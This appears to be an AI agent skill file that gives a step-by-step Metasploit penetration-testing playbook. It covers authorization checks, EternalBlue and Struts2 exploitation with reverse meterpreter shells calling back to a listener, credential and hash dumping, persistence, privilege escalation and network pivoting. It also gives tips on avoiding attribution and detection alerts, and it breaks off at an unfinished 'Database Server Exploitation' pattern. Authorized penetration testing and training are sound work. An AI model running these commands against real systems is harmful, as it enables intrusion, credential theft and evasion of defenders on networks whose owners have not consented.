Metasploit Framework Penetration Testing
Overview
Metasploit Framework is the industry-standard platform for penetration testing, vulnerability validation, and exploit development. This skill provides structured workflows for authorized offensive security operations including exploitation, post-exploitation, and payload delivery.
IMPORTANT: This skill is for AUTHORIZED security testing only. Always ensure proper authorization, scoping documents, and legal compliance before conducting penetration testing activities.
Quick Start
Initialize Metasploit console and verify database connectivity:
# Start PostgreSQL database (required for workspace management)
sudo systemctl start postgresql
# Initialize Metasploit database
msfdb init
# Launch Metasploit console
msfconsole
# Verify database connection
msf6 > db_status
Core Workflow
Penetration Testing Workflow
Progress: [ ] 1. Verify authorization and scope [ ] 2. Configure workspace and target enumeration [ ] 3. Identify and select appropriate exploits [ ] 4. Configure payload and exploit options [ ] 5. Execute exploitation with proper documentation [ ] 6. Conduct post-exploitation activities (if authorized) [ ] 7. Document findings with impact assessment [ ] 8. Clean up artifacts and sessions
Work through each step systematically. Check off completed items.
1. Authorization Verification
CRITICAL: Before any testing activities:
- Confirm written authorization from asset owner
- Review scope document for in-scope targets
- Verify IP ranges and systems authorized for testing
- Confirm allowed testing windows and blackout periods
- Document point of contact for emergency escalation
2. Workspace Setup
Create isolated workspace for engagement:
msf6 > workspace -a <engagement-name>
msf6 > workspace <engagement-name>
msf6 > db_nmap -sV -sC -O <target-ip-range>
Import existing reconnaissance data:
msf6 > db_import /path/to/nmap-scan.xml
msf6 > hosts
msf6 > services
3. Exploit Selection
Search for relevant exploits based on enumerated services:
msf6 > search type:exploit platform:windows <service-name>
msf6 > search cve:<cve-id>
msf6 > search eternalblue
Evaluate exploit suitability:
- Reliability Ranking: Excellent > Great > Good > Normal > Average
- Stability: Check crash potential
- Target Compatibility: Verify OS version and architecture
- Required Credentials: Determine if authentication needed
4. Exploit Configuration
Configure selected exploit module:
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RPORT 445
# Configure payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <listener-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 443
# Validate configuration
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
5. Exploitation Execution
Execute exploit with logging:
# Enable logging
msf6 exploit(windows/smb/ms17_010_eternalblue) > spool /path/to/logs/engagement-<date>.log
# Run exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
# Or run without auto-interaction
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
Exploitation outcomes:
- Session opened: Successful exploitation, proceed to post-exploitation
- Exploit failed: Review target compatibility, try alternative exploits
- Target not vulnerable: Document finding, move to next target
- Service crash: Document stability issue, attempt service restoration if authorized
6. Post-Exploitation (Authorized Activities Only)
Once session established, conduct authorized post-exploitation:
# List active sessions
msf6 > sessions -l
# Interact with session
msf6 > sessions -i <session-id>
# Gather system information
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getprivs
# Check network configuration
meterpreter > ipconfig
meterpreter > route
# Enumerate running processes
meterpreter > ps
# Check security controls
meterpreter > run post/windows/gather/enum_av_excluded
meterpreter > run post/windows/gather/enum_logged_on_users
Common post-exploitation modules:
post/windows/gather/hashdump- Extract password hashes (requires SYSTEM privileges)post/multi/recon/local_exploit_suggester- Identify privilege escalation opportunitiespost/windows/gather/credentials/credential_collector- Gather stored credentialspost/windows/manage/persistence_exe- Establish persistence (if explicitly authorized)
7. Privilege Escalation
If authorized for privilege escalation:
# Identify escalation vectors
meterpreter > run post/multi/recon/local_exploit_suggester
# Migrate to stable process
meterpreter > ps
meterpreter > migrate <stable-process-pid>
# Attempt privilege escalation
meterpreter > getsystem
meterpreter > getuid
Manual privilege escalation workflow:
- Background current session:
background - Select escalation module:
use exploit/windows/local/<escalation-module> - Set session:
set SESSION <session-id> - Run exploit:
exploit
8. Lateral Movement
For authorized internal penetration tests:
# Enumerate network
meterpreter > run post/windows/gather/arp_scanner RHOSTS=<internal-subnet>
meterpreter > run auxiliary/scanner/smb/smb_version
# Pivot through compromised host
meterpreter > run autoroute -s <internal-subnet>/24
# Use compromised host as proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > run -j
Configure proxychains for pivoting:
# Edit /etc/proxychains4.conf
socks4 127.0.0.1 1080
# Run tools through pivot
proxychains nmap -sT -Pn <internal-target>
Security Considerations
Authorization & Legal Compliance
- Written Authorization: Maintain signed penetration testing agreement
- Scope Adherence: Only test explicitly authorized systems and networks
- Data Protection: Handle discovered data per engagement rules of engagement
- Incident Response: Immediately report critical findings per escalation procedures
- Evidence Handling: Maintain chain of custody for forensic evidence
Operational Security
- Callback Infrastructure: Use dedicated, authorized callback servers
- Attribution Prevention: Avoid personal infrastructure or identifiable indicators
- Traffic Encryption: Use encrypted payloads (HTTPS, DNS tunneling)
- Artifact Cleanup: Remove exploitation artifacts post-engagement
- Session Management: Close sessions cleanly to avoid detection alerts
Audit Logging
Log all penetration testing activities:
- Timestamp of exploitation attempts
- Source and destination systems
- Exploit modules and payloads used
- Commands executed in sessions
- Data accessed or exfiltrated
- Privilege escalation attempts
- Lateral movement actions
Compliance
- PTES: Penetration Testing Execution Standard compliance
- OWASP: Alignment with application security testing methodology
- MITRE ATT&CK: Map TTPs to ATT&CK framework for threat modeling
- PCI-DSS 11.3: Penetration testing for payment card environments
- SOC2: Security testing for service organization controls
Common Patterns
Pattern 1: Web Application Exploitation
msf6 > use exploit/multi/http/apache_struts2_content_type_ognl
msf6 exploit(...) > set RHOSTS <web-server>
msf6 exploit(...) > set TARGETURI /vulnerable-app
msf6 exploit(...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(...) > exploit
Pattern 2: Database Server Exploitation
`